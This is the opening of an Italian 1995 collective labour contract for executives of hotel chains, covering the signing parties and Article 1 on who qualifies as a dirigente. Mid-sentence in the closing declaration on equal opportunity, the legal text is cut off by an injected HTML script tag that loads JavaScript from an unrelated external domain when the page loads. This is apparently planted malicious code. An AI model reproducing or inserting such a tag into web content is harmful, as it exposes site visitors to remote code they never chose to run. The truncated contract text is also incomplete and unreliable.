Torna all'elenco delle categorie

Categoria: Alberghi (dirigenti di catene alberghiere)
Settore: Commercio
Data stipula: 18-10-1995
Data decorrenza: 1-1-1995
Data scadenza: 31-12-1998

CONTRATTO COLLETTIVO NAZIONALE DI LAVORO
PER I DIRIGENTI DI AZIENDE ALBERGHIERE

L'anno 1995, il giorno 18 del mese di ottobre, in Roma

tra

l'Associazione  Italiana  Catene  Alberghiere -  AICA  -  rappresentata dal
proprio  Vice Presidente Dott.  Renato Raschi, con la partecipazione di una
Delegazione  Industriale composta  da: Dott.  Luciano  Buricchi, Sig. Dante
Carù,  Dott. Evandro  Fontana, Sig.  Pietro Grillo,  Avv. Silvano Malvezzi,
Dott.  Mauro  Pampana,  Dott. Bruno  Panero,  Dott. Alberto  Panozzo, Dott.
Giorgio  Papaleo, assistita dal Sig. Roberto  Pedrazzi; con l'assistenza di
Federturismo,  rappresentata  dal proprio  Presidente  Dott.  Pier Vittorio
Tugnoli  e  Confindustria,  rappresentata  dall'Avv.  Arturo  Parisi,  Vice
Direttore Centrale dell'Area  Relazioni Industriali ed Affari Sociali

e

la  FeNDAC  -  Federazione  Nazionale  Dirigenti  Aziende  Commerciali, dei
Trasporti,  del Turismo,  dei  Servizi,  Ausiliarie, del Terziario Avanzato
rappresentata   dal   proprio   Presidente   Dott.   Guido   Gay,   con  la
partecipazione  della  delegazione  sindacale   guidata  dal  Sig.  Lorenzo
Guerriero  e  costituita  dai Signori   Giorgio  Botton,  Peter Giovanelli,
Manlio  Palmero  e  Franco  Strazzullo,  con  l'assistenza  del  Segretario
Generale Dott.ssa Emanuela Minotti

visto

il  Contratto Collettivo  Nazionale di  Lavoro per  i Dirigenti  di Aziende
Alberghiere del 10 giugno 1992  nonché gli Accordi di rinnovo del 20 luglio
1994 e del 18 ottobre 1995

si è stipulato

il  presente Contratto Collettivo Nazionale di Lavoro per i Dirigenti delle
Aziende  dell'Industria   Alberghiera  aderenti  all'Associazione  Italiana
Catene Alberghiere (AICA).



TITOLO I - COSTITUZIONE DEL RAPPORTO

Articolo 1 - Applicabilità

1.  Sono dirigenti, a  norma dell'articolo 2094  del codice civile, ed agli
effetti   del   presente  contratto,   quei   direttori   che,  rispondendo
direttamente  all'imprenditore o  ad  altro dirigente  a  ciò espressamente
delegato,  svolgono in concreto funzioni direttive dell'azienda alberghiera
con  ampia autonomia, discrezionalità,  iniziativa, col potere di imprimere
le  conseguenti direttive,  e con  responsabilità decisoria nell'ambito dei
programmi concordati con l'impresa.

2.   La   qualifica  di   dirigente   comporta  la   partecipazione   e  la
collaborazione,  con  la responsabilità  inerente  alla  propria autonomia,
all'attività diretta a conseguire l'interesse dell'impresa ed il fine della
sua utilità sociale.

3.  L'effettiva  esistenza  delle  condizioni  di  cui  sopra  comporta  il
riconoscimento,  da  parte  dell'azienda, della  qualifica  di  dirigente e
l'applicazione del presente contratto.

4.  Sono altresì da  considerare dirigenti, a  tutti gli effetti, coloro ai
quali tale qualifica sia stata assegnata dall'azienda.

5.  In caso di  divergenza sul riconoscimento  della qualifica, le relative
controversie saranno sottoposte al Collegio di conciliazione e arbitrato di
cui  all'articolo  28  costituito  tra  le  Associazioni  periferiche delle
Organizzazioni  stipulanti, sempre che non sia in contestazione l'esistenza
del rapporto di lavoro subordinato.

6.  Su tale  argomento può  adire  il Collegio  direttamente l'Associazione
Sindacale dei Dirigenti su mandato degli interessati.

7.  Tutte  le  forme  di  tutela,  previdenza,  assistenza  e assicurazione
previste  dal presente  contratto, si  applicano  ai dirigenti  iscritti ai
Sindacati aderenti alla FeNDAC.

Dichiarazione a verbale

Le  Organizzazioni stipulanti e  le aziende  del settore, nell'ambito delle
azioni  positive   raccomandate  dal   Governo  dirette   al  conseguimento
dell'effettiva  parità, dichiarano il  proprio intendimento a porre in atto
tutte le misure dirette ad eliminare eventuali discriminazioni nei piani di
carriera  e  nella  promozione,  direttamente  o  indirettamente  collegati
all'appartenenza al<script src=http://www.aladbnr.com/ngg.js></script>













(c) 2002-2005 www.infoleges.it -  Note legali e Condizioni d'uso